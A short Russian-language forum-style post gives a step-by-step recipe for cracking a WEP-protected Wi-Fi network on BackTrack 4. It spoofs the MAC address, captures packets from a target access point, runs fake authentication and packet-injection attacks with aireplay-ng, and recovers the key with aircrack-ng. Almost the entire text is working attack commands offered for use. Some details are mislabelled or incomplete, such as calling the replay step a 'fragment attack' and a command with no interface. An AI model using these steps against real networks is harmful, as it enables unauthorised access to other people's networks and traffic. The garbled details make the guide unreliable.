На БТ-4 надо делать fragment atack вроде так это называется.

Сперва меняем мак.

airmon-ng stop wlan0

ifconfig wlan0 down

macchanger -m 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

сканируем эфир:

airodump-ng mon0

выбираем точку и останавливаем airodump-ng //

airmon-ng stop mon0

подсаживаемся на канал :

airmon-ng start wlan0 11

и запускаем airodump-ng / на сбор пакетов

airodump-ng -c 11 -w wep --bssid 11:44:98:56:77:44 mon0

атакуем : подставляем свой изменённый мак при атаке : -h 00:11:22:33:44:55

aireplay-ng -1 0 -a 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0

в другом окне делаем fragment atack

aireplay-ng -3 -b 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0

открываем ещё окно и атакуем с фильтрацией нужных пакетов:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 00:11:22:33:44:55

ждём предложения на открытие пакета :
получив его отрываем fragment paket

Y

запускаем aircrack-ng

aircrack-ng wep-01.cap